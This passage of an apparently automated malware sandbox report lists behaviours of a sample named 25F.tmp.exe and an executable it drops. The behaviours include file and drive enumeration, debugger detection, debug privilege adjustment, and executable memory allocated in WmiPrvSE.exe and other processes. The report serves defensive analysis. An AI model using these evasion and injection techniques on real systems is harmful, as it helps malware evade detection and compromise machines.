            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 13_2_001BF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,13_2_001BF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 14_2_0035F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,14_2_0035F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 15_2_0031F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,15_2_0031F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 16_2_0038F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,16_2_0038F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 17_2_0010F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,17_2_0010F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 18_2_0010F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,18_2_0010F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 19_2_0022F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,19_2_0022F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 20_2_0032F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,20_2_0032F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 21_2_0051F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,21_2_0051F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 22_2_0019F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,22_2_0019F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 23_2_0084F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,23_2_0084F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 25_2_0040F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,25_2_0040F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 26_2_0082F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,26_2_0082F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 27_2_0009F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,27_2_0009F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 29_2_005DF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,29_2_005DF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 30_2_0009F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,30_2_0009F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 31_2_0091F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,31_2_0091F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 32_2_0039F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,32_2_0039F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 33_2_0009F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,33_2_0009F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 34_2_0022F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,34_2_0022F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 35_2_0015F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,35_2_0015F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 36_2_007FF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,36_2_007FF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 37_2_0025F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,37_2_0025F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 38_2_0026F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,38_2_0026F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 39_2_003FF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,39_2_003FF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 40_2_003FF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,40_2_003FF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 41_2_0028F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,41_2_0028F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 42_2_0010F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,42_2_0010F130
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_0036F9E0 memset,GetLogicalDriveStringsA,lstrcatA,lstrcatA,4_2_0036F9E0
            Source: C:\Users\user\Desktop\25F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_0-5164
            Source: C:\Users\user\Desktop\25F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-6620
            Source: C:\Users\user\Desktop\25F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-6167
            Source: C:\Users\user\Desktop\25F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_4-10263
            Source: C:\Users\user\Desktop\25F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_4-10254
            Source: C:\Users\user\Desktop\25F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_4-10259
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Found API chain indicative of debugger detection
            Source: C:\Users\user\Desktop\25F.tmp.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_4-10955
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00365A20 LdrEnumerateLoadedModules,CloseHandle,CreateThread,CloseHandle,CreateThread,CloseHandle,4_2_00365A20
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_0040399B LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0040399B
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_00608A6C mov eax, dword ptr fs:[00000030h]0_2_00608A6C
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_00608A40 mov eax, dword ptr fs:[00000030h]0_2_00608A40
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_00608A50 mov eax, dword ptr fs:[00000030h]0_2_00608A50
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_00608A6C mov eax, dword ptr fs:[00000030h]2_2_00608A6C
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_00608A40 mov eax, dword ptr fs:[00000030h]2_2_00608A40
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_00608A50 mov eax, dword ptr fs:[00000030h]2_2_00608A50
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_004015A0 movd mm0, dword ptr fs:[00000030h]2_2_004015A0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_003635B0 mov eax, dword ptr fs:[00000030h]4_2_003635B0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_004035B0 mov eax, dword ptr fs:[00000030h]4_2_004035B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 9_2_003D35B0 mov eax, dword ptr fs:[00000030h]9_2_003D35B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 10_2_001835B0 mov eax, dword ptr fs:[00000030h]10_2_001835B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 11_2_003835B0 mov eax, dword ptr fs:[00000030h]11_2_003835B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 12_2_004135B0 mov eax, dword ptr fs:[00000030h]12_2_004135B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 13_2_001B35B0 mov eax, dword ptr fs:[00000030h]13_2_001B35B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 14_2_003535B0 mov eax, dword ptr fs:[00000030h]14_2_003535B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 15_2_003135B0 mov eax, dword ptr fs:[00000030h]15_2_003135B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 16_2_003835B0 mov eax, dword ptr fs:[00000030h]16_2_003835B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 17_2_001035B0 mov eax, dword ptr fs:[00000030h]17_2_001035B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 18_2_001035B0 mov eax, dword ptr fs:[00000030h]18_2_001035B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 19_2_002235B0 mov eax, dword ptr fs:[00000030h]19_2_002235B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 20_2_003235B0 mov eax, dword ptr fs:[00000030h]20_2_003235B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 21_2_005135B0 mov eax, dword ptr fs:[00000030h]21_2_005135B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 22_2_001935B0 mov eax, dword ptr fs:[00000030h]22_2_001935B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 23_2_008435B0 mov eax, dword ptr fs:[00000030h]23_2_008435B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 25_2_004035B0 mov eax, dword ptr fs:[00000030h]25_2_004035B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 26_2_008235B0 mov eax, dword ptr fs:[00000030h]26_2_008235B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 27_2_000935B0 mov eax, dword ptr fs:[00000030h]27_2_000935B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 29_2_005D35B0 mov eax, dword ptr fs:[00000030h]29_2_005D35B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 30_2_000935B0 mov eax, dword ptr fs:[00000030h]30_2_000935B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 31_2_009135B0 mov eax, dword ptr fs:[00000030h]31_2_009135B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 32_2_003935B0 mov eax, dword ptr fs:[00000030h]32_2_003935B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 33_2_000935B0 mov eax, dword ptr fs:[00000030h]33_2_000935B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 34_2_002235B0 mov eax, dword ptr fs:[00000030h]34_2_002235B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 35_2_001535B0 mov eax, dword ptr fs:[00000030h]35_2_001535B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 36_2_007F35B0 mov eax, dword ptr fs:[00000030h]36_2_007F35B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 37_2_002535B0 mov eax, dword ptr fs:[00000030h]37_2_002535B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 38_2_002635B0 mov eax, dword ptr fs:[00000030h]38_2_002635B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 39_2_003F35B0 mov eax, dword ptr fs:[00000030h]39_2_003F35B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 40_2_003F35B0 mov eax, dword ptr fs:[00000030h]40_2_003F35B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 41_2_002835B0 mov eax, dword ptr fs:[00000030h]41_2_002835B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 42_2_001035B0 mov eax, dword ptr fs:[00000030h]42_2_001035B0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00363830 GetProcessHeap,HeapReAlloc,4_2_00363830
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeProcess token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 1B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: C50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
